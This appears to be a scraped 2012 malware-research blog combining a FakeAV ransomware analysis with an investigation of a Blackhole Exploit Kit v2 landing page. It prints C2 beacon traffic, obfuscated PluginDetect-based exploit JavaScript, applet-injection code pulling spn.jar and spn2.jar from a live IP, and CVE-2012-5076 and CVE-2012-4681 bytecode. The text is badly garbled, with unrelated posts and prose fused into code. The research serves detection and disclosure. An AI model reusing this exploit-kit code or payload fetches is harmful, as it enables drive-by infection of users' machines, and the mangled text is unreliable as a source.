.text:0040DFD9 mov dword_412CAC, ecx
.text:0040DFDF pop ebp
.text:0040DFE0 retnBehaviour Analysis
This is the result if you run the softwares, I'll make it brief. //File activities...//self deletion of the original sample..//Created processes...
////drops & self-copied into...
1. C:\Documents and Settings\User\Local Settings\Application Data\hdjusttt.exe
*) This name is random in every case...//By: origin hdjusttt.exe 249d145396baa974753e41d79982ae81190ffeafd24b9acdadc2d451fdb8f81d ,//Three important Registry changes detected...
//path=C:\Documents and Settings\User\Local Settings\Application Data\hdjusttt.exe (sample)
+-- 0xf0 notepad.exe C:\WINDOWS\system32\NOTEPAD.EXE
+-- 0x7e4 svchost.exe C:\WINDOWS\system32\svchost.exe (Foreign Memory Regions Written)
//With thread below...
0xf0 notepad.exe 0xf4 0x7c810867
+--0x348 svchost.exe 0x784 0x7c810856 (Foreign Memory Regions Written)
+--0x3e8 svchost.exe 0x94 0x7c810856 (Foreign Memory Regions Written)
+--0x7e4 svchost.exe 0xb8 0x7c810867 (Foreign Memory Regions Written)//Creating fake NotePad...//Downloads and install FakeAV components:
//Internet settings...
Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
From: 56/56
To: XX/XX //binary...
//malware exec start origin regists...
Key: HKU\..\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders
Type: Local AppData
New: C:\DocumentsandSettings\Administrator\LocalSettings\Application Datadate hrs size filename md5//And runs it like this captured...
2012/11/24 20:53 2,960 945C33B96395E50D0000945B9F62EA33 811cfb9b55bd85562a5466918ebd2c63
2012/11/24 20:09 443,392 945C33B96395E50D0000945B9F62EA33.exe 62ed7e0847e333064d75555446d92bff
2012/11/24 20:09 4,286 945C33B96395E50D0000945B9F62EA33.ico f979390b4527bed0661ff1130202a1b5Yes, the strange desktop task icons shows you fake alert... And the Notepad suddenly popped-up, I suppose is to make users feel that - the PC is currently infected (LOL) //Then it started to scan your PC with fake scans & licking everything...
After the scan done it will pop this message to make you pay to continue using ur PC..
↑I marked the support center & the non-refund terms.. It dropped the malware saved data below: File:945C33B96395E50D0000945B9F62EA33 MD5:811cfb9b55bd85562a5466918ebd2c63, Contents:
Not only the above crime, this software actually sent ur data outside, see the PoC in the Network analysis below...
0000 41 3B 11 3E 7D 59 5F 25 69 48 32 1B 6C 64 69 18 A;.>}Y_%iH2.ldi.
0010 71 5A 7A 70 1C 15 72 70 DB 42 18 DA 74 1F FB 00 qZzp..rp.B..t...
0020 94 A0 F4 CB 2A D9 90 09 FF A9 2C F8 57 27 9E 71 ....*.....,.W'.q
0030 99 78 6D 9F 50 87 F6 7F 5A AE 72 C7 CD 45 BD 80 .xm.P...Z.r..E..
0040 31 8F F0 0F 04 6B 4B 46 3D 68 F0 E7 91 89 C5 B3 1....kKF=h......
0050 70 45 14 80 9F 3E D4 2B 19 45 D7 7C C2 4A 98 AA pE...>.+.E.|.J..
0060 AA 39 19 F8 E8 68 4D 16 DB B2 CF CE 70 5D 69 35 .9...hM.....p]i5
0070 FA A1 C7 A3 DB 84 31 44 D4 F3 05 0C C1 CB 91 06 ......1D........
0080 FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71 ..,.W'.q..,.W'.q
0090 FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71 ..,.W'.q..,.W'.q
00A0 FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71 ..,.W'.q..,.W'.q
00B0 FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71 ..,.W'.q..,.W'.q
00C0 FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71 ..,.W'.q..,.W'.q
00D0 FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71 ..,.W'.q..,.W'.q
00E0 FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71 ..,.W'.q..,.W'.q
00F0 FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71 ..,.W'.q..,.W'.q
0100 FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71 ..,.W'.q..,.W'.q
0110 FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71 ..,.W'.q..,.W'.q
0120 FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71 ..,.W'.q..,.W'.q
0130 FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71 ..,.W'.q..,.W'.q
0140 FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71 ..,.W'.q..,.W'.q
0150 FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71 ..,.W'.q..,.W'.q
0160 FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71 ..,.W'.q..,.W'.q
0170 FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71 ..,.W'.q..,.W'.q
0180 FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71 ..,.W'.q..,.W'.q
0190 FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71 ..,.W'.q..,.W'.q
01A0 FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71 ..,.W'.q..,.W'.q
01B0 FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71 ..,.W'.q..,.W'.q
01C0 FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71 ..,.W'.q..,.W'.q
01D0 FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71 ..,.W'.q..,.W'.q
01E0 FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71 ..,.W'.q..,.W'.q
01F0 FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71 ..,.W'.q..,.W'.qNetwork analysis
Three communications to,, occurred: The first trace network was the download of the FakeAV program, from Host:, memo'ed this as below:0000 00 a0 c9 22 b0 ee 00 1b 8b 69 9d 9d 08 00 45 00 ...".... .i....E.↑It said GET /945C33B96395E50D0000945B9F62EA33.exe HTTP/1.0 After getting installed I recorded all of comm PCAP data, highlighted below: //Sending data to ( using HTTP/POST
0010 00 b7 8f 3c 40 00 80 06 47 38 c0 a8 07 02 d9 4c ...<@... G8.....L
0020 82 d5 06 6b 00 50 b4 7c 5e fe 0e 68 c8 3f 50 18 ...k.P.| ^..h.?P.
0030 7d 78 a9 18 00 00 47 45 54 20 2f 39 34 35 43 33 }x....GE T /945C3
0040 33 42 39 36 33 39 35 45 35 30 44 30 30 30 30 39 3B96395E 50D00009
0050 34 35 42 39 46 36 32 45 41 33 33 2e 65 78 65 20 45B9F62E A33.exePOST /index.php HTTP/1.1And got replied below: (NOTE: It saved data in your PC)
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 848
Content-Disposition: form-data; name="sid"
Content-Disposition: form-data; name="up"
Content-Disposition: form-data; name="wbfl"
Content-Disposition: form-data; name="v"
Content-Disposition: form-data; name="ping"
Content-Disposition: form-data; name="guid"
Content-Disposition: form-data; name="wv"
Content-Disposition: form-data; name="ms"
Content-Disposition: form-data; name="sr"
Content-Disposition: form-data; name="ar"
--1BEF0A57BE110FD467A--HTTP/1.1 200 OK//Then it sends data to ( via HTTP/POST like as before...
Server: nginx/0.8.54
Date: Sat, 24 Nov 2012 11:46:15 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.4.4-7
Vary: Accept-Encoding
Content-Length: 823
HTTP/1.1 200 OK
Date: Sat, 24 Nov 2012 11:46:22 GMT
Server: Apache/2.2.16
Content-Length: 637
Connection: close
Content-Type: multipart/form-data; boundary="1BEF0A57BE110FD467A"
Content-Disposition: form-data; name="COMMON"; filename="COMMON.BIN"
Content-Type: application/octet-stream
'h~w}rk%."5*)-5*(*5*()'4h~w}rk%.'4ywtxp%--1BEF0A57BE110FD467A--POST /index.php HTTP/1.1And got replied too↓(NOTE: It saved data in your PC)
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 848
Content-Disposition: form-data; name="sid"
Content-Disposition: form-data; name="up"
Content-Disposition: form-data; name="wbfl"
Content-Disposition: form-data; name="v"
Content-Disposition: form-data; name="ping"
Content-Disposition: form-data; name="guid"
Content-Disposition: form-data; name="wv"
Content-Disposition: form-data; name="ms"
Content-Disposition: form-data; name="sr"
Content-Disposition: form-data; name="ar"
--1BEF0A57BE110FD467A--HTTP/1.1 200 OK//Then it seeked DNS of TestPC --> DNS Standard query A --> TestPC DNS Standard query response A
Server: nginx/1.2.5
Date: Sat, 24 Nov 2012 11:53:53 GMT
Content-Type: text/html
Content-Length: 823
Connection: keep-alive
X-Powered-By: PHP/5.4.4-7
Vary: Accept-Encoding
HTTP/1.1 200 OK
Date: Sat, 24 Nov 2012 11:50:37 GMT
Server: Apache/2.2.16
Content-Length: 637
Connection: close
Content-Type: multipart/form-data; boundary="1BEF0A57BE110FD467A"
Content-Disposition: form-data; name="COMMON"; filename="COMMON.BIN"
Content-Type: application/octet-stream
wtxp%--1BEF0A57BE110FD467A--0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.Which ending up the request of the support center web site...
0010 00 43 01 39 00 00 80 11 61 65 c0 a8 07 54 08 08 .C.9.... ae...T..
0020 08 08 04 b4 00 35 00 2f b5 9d d5 31 01 00 00 01 .....5./ ...1....
0030 00 00 00 00 00 00 03 73 79 73 0d 63 6f 75 67 61 .......s ys.couga
0040 72 73 75 70 70 6f 72 74 03 6e 65 74 00 00 01 00 rsupport .net....
0050 01GET /?nid=9455E50D HTTP/1.1Here's the snapshot of support page of this sh*t↓
Accept: */*
Accept-Language: ja
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Nov 2012 11:54:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.14
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "h00p://">
<html xmlns="h00p://" xml:lang="en" lang="en">
<title> System Progressive Protection </title>
<meta h00p-equiv="Content-type" content="text/html;charset=UTF-8" />
<link rel="stylesheet" type="text/css" href="styles/main.css" />
<div class="wrap">
<div class="left-part">
<div class="logo-img">
<img src="/img/system-progressive-protection.png" alt="logo" />
</div> :
IP Infector's History Analysis
As we see, the A record leads us to IP, I think I saw the before... seeking the notes & found below previous infections in that IP://infector records, source: SPAMLet's see the current status of this IP infector, suspected an EK is active there, used the recent url... //fetch...
//trojan dropped records, source also SPAM
h00p:// h00p:// is an an IFRAME m1 & m2.htm
=> `index.html'
Connecting to||:80... connected.
HTTP request sent, awaiting response... 200 OK
HTTP/1.1 200 OK
Content-Length: 481
Content-Type: text/html
Content-Location: h00p://
Last-Modified: Wed, 29 Feb 2012 11:59:52 GMT
Accept-Ranges: bytes
ETag: "caa60a5d9f6cc1:958"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 24 Nov 2012 08:06:03 GMT
Connection: keep-alive
Length: 481 [text/html]
17:03:37 (12.07 MB/s) - `index.html' saved [481/481]$ cat index.htmlAnd we found what looks like infector in m2.htm↓
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Cimat Foto s.a.</title>
<frameset rows="1,*" cols="*" framespacing="0" frameborder="NO" border="0">
<frame src="m1.htm" name="m1" scrolling="NO" noresize id="m1">
<frame src="m2.htm" name="m2" id="m2">
</html>--17:07:54-- h00p:// us to download Inicio.html & lead us to spanish photography online store/site, a spam site it is (darn!) But the other history of the downloaded trojans shows us this is not a good site/IP. We know it is an unhealthy redirector scheme and God knows what other evil landing page w/redir schemes exists in this IP..
=> `m2.htm'
Connecting to||:80... connected.
h00p request sent, awaiting response... 200 OK
Length: 736 [text/html]
17:07:55 (20.76 MB/s) - `m2.htm' saved [736/736]
$ cat m2.htm
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
<meta h00p-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Documento sin título</title>
<script language="JavaScript" type="text/JavaScript">
function MM_goToURL() { //v3.0
var i, args=MM_goToURL.arguments; document.MM_returnValue = false;
for (i=0; i<(args.length-1); i+=2) eval(args[i]+".location='"+args[i+1]+"'");
<body onLoad="MM_goToURL('parent.frames[\'m2\']','WEB/Inicio.html');return document.MM_returnValue">
<img src="h00p://">
</html>Samples / References
Samples of this analysis↓You can download them here-->>[CLICK] Virus Total Detection Ratio↓ CMUNFWKUWY.html 4fc7aba0c29053469b9f5c6ff2b04c1b (0/44) malware.eml 434b9db6d22b0a09f3adab8ae8ebdf34 (0/44) Postal_Receipt.exe 3811ed1d5493d02ee7720f36e31a54c4 (20/44) f59f065647151aa701c553bea0da44c1 (22/44) 945C33B96395E50D0000945B9F62EA33.exe 62ed7e0847e333064d75555446d92bff (2/44) ↑If you see these well, infectors are about 50% detected, but the FakeAV program - is only detected by 2(two) AntiVirus products..(ESET & K7) POINT is the usage of the crypter made malware detection ratio smaller.. If you got locked by this mess, below is the unlocked key:
AA39754E-715219CEThere are many way to REMOVE this malware -->>[CLICK] Be careful friends by opening UPS emails. Stay Safe!
Thứ Năm, 22 tháng 11, 2012
Chủ Nhật, 18 tháng 11, 2012

Still no idea what the problem actually is (spoke to Domain Monster again a few moments ago, and they're still working on it, MX and A records are absolutely fine), but if
Thứ Bảy, 17 tháng 11, 2012

I came into PluginDetect 0.7.9 usage in the BHEK2 recently.
The software PluginDetect 0.7.9 was released today in with the following details:
PluginDetect Library
version: 0.7.9
released: 10/17/2012
by Eric Gerds
You can see it yourself in its website here --->>[CLICK]
Or see the below capture pic of the site (click to enlarge)
If you click the "Download PluginDetect" menu on the left side, you'll see
a javascript generator of PluginDetect, as per picture below:
After you choose your options on which components to detect of a browser,
this generator applet will burp a javascript code result like below:
↑If you see closely to the marked part of the code then you will recognize it -
as our old friend PluginDetect used to be used by BlackHole Exploit Kit v2/BHEK2.
PluginDetect is actually a useful good code to create a detection of a browser,
however BHEK2 and other EK is misused it for the bad purpose.
We know that BHEK2 were previously using PluginDetect 0.7.8, but today I bumped
to infector with using PluginDetect 0.7.9 with CVE-2012-5076 & below is the story:
Hinted by our @Hulk_Crusader, we investigated an infector site at:
It contains a lot of infector links as per snipped below:[1]Name [2]Last modified [3]Size*)I marked the suspicious filea above↑ I bet they are trojan malwares! (Hint: See the size of the files) Sadly the web server is well tuned & using ACL to block access, so we successfully fetched some files only, as per below:
[5]Jssl.php 16-Nov-2012 05:52 73K
[6]aVhg.html 11-Nov-2012 06:21 391
[7]bVhg.html 11-Nov-2012 06:21 611
[8]bablo5.php 16-Nov-2012 16:05 67
[9]bind.php 11-Nov-2012 07:24 12K
[10]faqPkOE.php 11-Nov-2012 07:32 8.2K
[11]favicon.gif 05-Sep-2011 14:17 0
[12]favicon.ico 05-Sep-2011 14:17 0
[13]index.main.php 16-Nov-2012 05:47 4.0K
[14]info.php 16-Nov-2012 05:49 34K
[15]jorik5.php 16-Nov-2012 16:05 74
[16]joy.php 16-Nov-2012 05:49 5.5K
[17]mainEFjd.php 16-Nov-2012 05:49 8.2K
[18]mainVjH.php 16-Nov-2012 05:49 8.2K
[19]page8.htm 16-Nov-2012 15:11 1.0K
[20]rVhg.html 11-Nov-2012 06:21 744
[21]sVhg.html 11-Nov-2012 06:21 664
[22]seo4.php 16-Nov-2012 16:05 70
[23]sitemapl82.php 16-Nov-2012 05:50 8.2K
[24]stylecss.php 16-Nov-2012 05:51 24K
[25]system_file.php 16-Nov-2012 15:11 71
[26]topsale5.php 16-Nov-2012 16:05 67
[27]w11292880n.php 16-Nov-2012 05:51 24K
[28]w11384180n.php 16-Nov-2012 05:52 24K
[29]w11884808n.php 16-Nov-2012 05:53 24K
[30]w11991996n.php 16-Nov-2012 05:53 24K
[31]w12272200n.php 16-Nov-2012 05:54 24K
[32]w12745201n.php 09-Nov-2012 06:54 303K <=== suspicious
[33]w14074084n.php 16-Nov-2012 05:54 92K
[34]w14137042n.php 16-Nov-2012 05:54 92K
[35]w14455434n.php 16-Nov-2012 05:55 24K
[36]w15104461n.php 16-Nov-2012 05:56 70K
[37]w16762030n.php 16-Nov-2012 05:56 24K
[38]w17886614n.php 16-Nov-2012 05:56 70K
[39]w18956554n.php 16-Nov-2012 05:57 24K
[40]w19446592n.php 16-Nov-2012 05:58 24K
[41]w19572944n.php 16-Nov-2012 05:58 24K
[42]w20687587n.php 16-Nov-2012 05:58 24K
[43]w21108783n.php 16-Nov-2012 05:58 24K
[44]w22312966n.php 16-Nov-2012 06:00 24K
[45]w24463996n.php 16-Nov-2012 06:00 24K
[46]w24813801n.php 16-Nov-2012 06:02 24K
[47]w24912540n.php 16-Nov-2012 06:03 24K
[48]w25181459n.php 16-Nov-2012 06:05 24K
[49]w25516725n.php 16-Nov-2012 06:05 92K
[50]w26388892n.php 09-Nov-2012 06:37 297K <=== suspicious
[51]w26953552n.php 16-Nov-2012 06:07 92K
[52]w27341032n.php 16-Nov-2012 06:08 24K
[53]w27711058n.php 16-Nov-2012 06:10 24K
[54]w27944845n.php 16-Nov-2012 06:11 24K
[55]w29438343n.php 16-Nov-2012 12:36 23K
[56]w32104720n.php 16-Nov-2012 12:36 23K
[57]w32403343n.php 16-Nov-2012 12:36 23K
[58]w32844482n.php 16-Nov-2012 12:36 23K
[59]w33118612n.php 16-Nov-2012 12:36 23K
[60]w33764801n.php 16-Nov-2012 12:36 23K
[61]w36011284n.php 16-Nov-2012 12:36 23K
[62]w36584950n.php 09-Nov-2012 07:36 138K <=== suspicious
[63]w37531540n.php 16-Nov-2012 12:36 23K
[64]w37715594n.php 16-Nov-2012 12:36 23K
[65]w37727072n.php 16-Nov-2012 12:36 23K
[66]w38297236n.php 16-Nov-2012 12:36 23K
[67]w38994382n.php 16-Nov-2012 12:36 23K
[68]w39565125n.php 16-Nov-2012 12:36 23K
[69]w39715194n.php 16-Nov-2012 12:36 23K
[70]w41352222n.php 16-Nov-2012 12:36 23K
[71]w42271663n.php 16-Nov-2012 12:36 92K
[72]w42595965n.php 16-Nov-2012 12:36 23K
[73]w43085485n.php 16-Nov-2012 12:36 23K
[74]w43584820n.php 16-Nov-2012 12:36 23K
[75]w45042947n.php 16-Nov-2012 12:36 23K
[76]w48788700n.php 16-Nov-2012 12:36 23K
[77]w49496620n.php 16-Nov-2012 12:36 23K
[78]w49977014n.php 16-Nov-2012 12:36 23K
[79]w51693290n.php 16-Nov-2012 12:36 23K
[80]w52354703n.php 16-Nov-2012 12:36 23K
[81]w54253689n.php 16-Nov-2012 12:36 23K
[82]w54406687n.php 16-Nov-2012 12:36 23K
[83]w54854224n.php 16-Nov-2012 12:36 23K
[84]w54924852n.php 16-Nov-2012 12:36 23K
[85]w55756681n.php 16-Nov-2012 12:36 23K
[86]w56926790n.php 16-Nov-2012 12:36 69K
[87]w57142260n.php 16-Nov-2012 12:36 23K
[88]w57288477n.php 16-Nov-2012 12:36 160K <=== suspicious
[89]w57363423n.php 16-Nov-2012 12:36 23K
[90]w57574466n.php 16-Nov-2012 12:36 23K
[91]w58386696n.php 16-Nov-2012 12:36 23K
[92]w58414355n.php 16-Nov-2012 12:36 69K
[93]w58824744n.php 16-Nov-2012 12:36 23K
[94]w59182790n.php 16-Nov-2012 12:36 23K
[95]w59615462n.php 16-Nov-2012 12:36 69K
[96]w59702531n.php 16-Nov-2012 12:36 23K
[97]w60326763n.php 09-Nov-2012 04:22 275K <=== suspicious
[98]w61856170n.php 16-Nov-2012 12:36 23K
[99]w62088643n.php 09-Nov-2012 07:38 161K <=== suspicious
[100]w64137644n.php 16-Nov-2012 12:36 115K <=== suspicious
[101]w64214598n.php 16-Nov-2012 12:36 69K
[102]w64908493n.php 16-Nov-2012 12:36 23K
[103]w64956301n.php 16-Nov-2012 12:36 23K
[104]w65944817n.php 16-Nov-2012 12:36 92K
[105]w65994077n.php 16-Nov-2012 12:36 23K
[106]w66442417n.php 16-Nov-2012 12:36 23K
[107]w67063022n.php 16-Nov-2012 12:36 23K
[108]w67424797n.php 16-Nov-2012 12:36 69K
[109]w68083912n.php 16-Nov-2012 12:36 92K
[110]w68562749n.php 16-Nov-2012 12:36 23K
[111]w69423332n.php 16-Nov-2012 12:36 23K
[112]w69863913n.php 16-Nov-2012 12:36 115K <=== suspicious
[113]w71004261n.php 16-Nov-2012 12:36 23K
[114]w71254201n.php 16-Nov-2012 12:36 23K
[115]w71703411n.php 16-Nov-2012 12:36 23K
[116]w72627688n.php 16-Nov-2012 12:36 23K
[117]w74483378n.php 16-Nov-2012 12:36 23K
[118]w75274537n.php 16-Nov-2012 12:36 115K <=== suspicious
[119]w78731488n.php 16-Nov-2012 12:36 92K
[120]w80343543n.php 16-Nov-2012 12:36 160K <=== suspicious
[121]w80903025n.php 09-Nov-2012 05:28 297K <=== suspicious
[122]w81115093n.php 16-Nov-2012 12:36 23K
[123]w81417750n.php 16-Nov-2012 12:36 23K
[124]w82277330n.php 16-Nov-2012 12:36 69K
[125]w82347261n.php 16-Nov-2012 12:36 23K
[126]w84467943n.php 16-Nov-2012 12:36 23K
[127]w85902715n.php 16-Nov-2012 12:36 69K
[128]w86577171n.php 16-Nov-2012 12:36 23K
[129]w86771427n.php 16-Nov-2012 12:36 23K
[130]w86911411n.php 16-Nov-2012 12:36 23K
[131]w86982141n.php 16-Nov-2012 12:36 92K
[132]w87326315n.php 16-Nov-2012 12:36 23K
[133]w88145056n.php 16-Nov-2012 12:36 92K
[134]w88205733n.php 16-Nov-2012 12:36 137K <=== suspicious
[135]w88685477n.php 16-Nov-2012 12:36 23K
[136]w89338108n.php 16-Nov-2012 12:36 23K
[137]w89476290n.php 16-Nov-2012 12:36 137K <=== suspicious
[138]w89705559n.php 16-Nov-2012 12:36 23K
[139]wp-conf.php 15-Nov-2012 22:26 185K <=== suspiciousaVhg.html 2a3e59f3088c06329e01acc3f4392e6fAll ↑files are mostly spam redirector but page8.htm contains malicious code:
bablo5.php 0423f6942706d9b36fc5551b472f12d9
jorik5.php 6e1a175421632987e00a589a93653e56
seo4.php 89cfb895e3381c2f174ef24e8c664839
topsale5.php 5e9eb5ddf71e1b4c56375c85aae92c69
page8.htm 57f31d9fc68cc28f1051028d761d8afcWhich we decoded easily to be like this:
↑Which is showing a malicious url of BHEK pattern. Shortly, we fetched it & by the TCP/HTTP data we can be sure is a BHEK:
--21:17:54--The downloaded file contains a condensed Javascript as per below hexed code:
Connecting to seconds 0.00, connected.
Created socket 1920.
---request begin---
GET /forum/links/column.php HTTP/1.0
Referer: h00p://
User-Agent: MalwareMustDie is knocking on your door |-(
Accept: */*
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sat, 17 Nov 2012 20:40:41 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
---response end---
200 OK
Length: unspecified [text/html]
Closed fd 1920
21:17:56 (43.56 KB/s) - `column.php' saved [31778]<html><head><title></title></head><body><script>try{if(window.document)window.document.body="asd"}catch(eYou can see full original code in our pastebin -->>[PASTEBIN]And a nice readable code can be seen here -->>[PASTEBIN] Seeing the decoded code well, we can see the PluginDetect 0.7.9 logic is used in it. The EK coder is misusing PluginDetect 0.7.9 base code for infection purpose. And since PluginDetect 0.7.9 released officially it was already used by infectors. Compares to the BHEK2 with previous PluginDetect 0.7.8, this version is using similar method, however some changes was detected as per following summary: Provided Exploits:
{var PluginDetect={version:"0.7.9",name:"PluginDetect",handler:function(c,b,a){return function(){c(b,a)}}
nction(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-]
test(e[a])){e[a]="0"}}return e.slice(0,4).join(",")},$$hasMimeType:function(a){return function(c){if(!a.i
j.isDefined(e)||e)?/\d/:0,k=c?new RegExp(c,"i"):0,a=navigator.plugins,g="",f,b,m;for(f=0;f<a.length;f++){
(m,"i"),h="",g=c?new RegExp(c,"i"):0,a,l,d,j=e.isString(k)?[k]:k;for(d=0;d<j.length;d++){if((f=e.hasMimeT
if(g.length>0&&!f[g]){f[g]=f[a](f);delete f[a]}}catch(d){}}}},initObj:function(e,b,d){var a,c;if(e){if(e[...Msxml2.XMLHTTPBrowser Access:Accepting only access from these html headers ;-))
wmplayer.ocx"Win",Strictly get version info value of browser engine versions...
d.addWinEvent("load",d.handler(d.runWLfuncs,d))Infector plugins:
1. Java ExploitmimeType:"application/x-java-applet","application/x-java-vm", "application/x-java-bean"],classID:"clsid:8AD9C840-044E-11D1-B3E9-00805F499D93"Aimed for generic exploit affecte to below Java Versions:[1,9,1,40]Also provided special handling for the specific Java version below:
[1,3,1,30]]k=[1,5,0,14],2. Flash Exploit
f=[1,5,0,7]mimeType:"application/x-shockwave-flash",progID:"ShockwaveFlash.ShockwaveFlash" ,classID:"clsid:D27CDB6E-AE6D-11CF-96B8-444553540000"Replacing the downloaded object by this into exe in locals... return e?e[0].replace(/[rRdD\.]/g,",").replace(/\s/g,""):null 3. Adobe ReadermimeType:"application/pdf",navPluginObj:null,progID:["AcroPDF.PDF","PDF.PdfCtrl"], classID:"clsid:CA8A9780-280D-11CF-A24D-444553540000"Logic to check adobe version is: if(pdfver[0]>0&&pdfver[0]<8) (pdfver[0]==8||(pdfver[0]==9&&pdfver[1]<4) //Hint! [Important!] New: makeSense functionWe detect a new control called makeSense() function to check the PDF & Java versions, it uses the below applet code to get & pass parameter version & vendor info:import java.applet.Applet;Let's go back to our case, this infection uses PluginDetect 0.7.9, So if we hit j1, j2 parameters correctly there are 2(two) jar malware downloads, as per coded below:
public class A extends Applet
public String getAppVersion()
return "3"; }
public String getProp(String paramString)
String str = "";
try {
if ((paramString instanceof String)) str = System.getProperty(paramString);
catch (Exception localException) {
return str; }
public String getVersion()
return getProp("java.version"); }
public String getVendor()
return getProp("java.vendor"); }
public void statusbar(String paramString)
if ((paramString instanceof String)) showStatus(paramString);
catch (Exception localException)
{}}}function j1() {Tracing the path and we get the jars as below:
var d=document.createElement("div");
d.innerHTML = '<applet archive="../data/spn2.jar" code="impossibla">
<param name="val" value="0b0909041f"/>
<param name="prime" value="3131271c083c181c3c37343c18371f181c181c312c174421233143323a11193138174321233a3c040b043d112c39081c1f373a1f37321f37321f080802043539270e1f37111f37231f08271f08081f37111f37111f08371f37361f3717020139372c02170e392802382c390b"/></applet>';
return true;
function j2() {
var d=document.createElement("div");
d.innerHTML = '<applet archive="../data/spn.jar" code="impossibla">
<param name="val" value="0b0909041f"/><
param name="prime" value="3131271c083c181c3c37343c18371f181c181c312c174421233143323a11193138174321233a3c040b043d112c39081c1f373a1f37321f37321f080802043539270e1f37111f37231f08271f08081f37111f37111f08371f37361f3717020139370502170e392802382c390b"/></applet>';
return true;
}--00:25:07-- h00p://203.80.16・81:8080/forum/data/spn.jarThese files are Java exploiter, There's abuse code of java.lang.String.inter CVE-2012-5076 code in "spn.jar" and - also CVE-2012-4681 & CVE-2012-1723 in "spn2.jar"; used to exploit+download payload. We will soon discussing these exploits. Some internet operation strings in both files can be viewed soon, like:
=> `spn.jar'
Connecting to 203.80.16・81:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12,745 (12K) [application/java-archive]
00:25:09 (37.62 KB/s) - `spn.jar' saved [12745/12745]
--00:25:14-- h00p://203.80.16・81:8080/forum/data/spn2.jar
=> `spn2.jar'
Connecting to 203.80.16・81:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 21,607 (21K) [application/java-archive]
00:25:16 (49.66 KB/s) - `spn2.jar' saved [21607/21607]* * * File: spn.jarBelow is the Exploit CVE-2012-5076 code used in spn.jar (click to enlarge)
41: invokevirtual 51 java/lang/Class:getResource (Ljava/lang/String;)Ljava/net/URL;
44: invokevirtual 55 java/net/URL:toString ()Ljava/lang/String;
103: new 56 java/net/URL
106: dup
107: aload 4
109: invokespecial 71 java/net/URL:(Ljava/lang/String;)V
137: checkcast 84 java/net/URLConnection
140: astore 6
142: aload 6
144: invokevirtual 86 java/net/URLConnection:getInputStream ()Ljava/io/InputStream;
* * * File: spn2.jar
49: invokevirtual 232 java/lang/Class:getResource (Ljava/lang/String;)Ljava/net/URL;
52: invokevirtual 236 java/net/URL:toString ()Ljava/lang/String;
113: new 68 java/net/URL
116: dup
117: aload 5
119: invokespecial 70 java/net/URL:(Ljava/lang/String;)V
148: checkcast 260 java/net/URLConnection
151: astore 7
153: aload 7
155: invokevirtual 262 java/net/URLConnection:getInputStream ()Ljava/io/InputStream;And below is the CVE-2012-4681 used in spn2.jar to download mess.. (click to enlarge)
↑is at the public static void impossibla(impossibld paramimpossibld) and in - the public Object impossibla() As per advised by @Dr4g0nFlySm0k3, in "spn2.jar" at public class impossiblb we also detected exploit CVE-2012-1723 code as per snipped below (core code only):
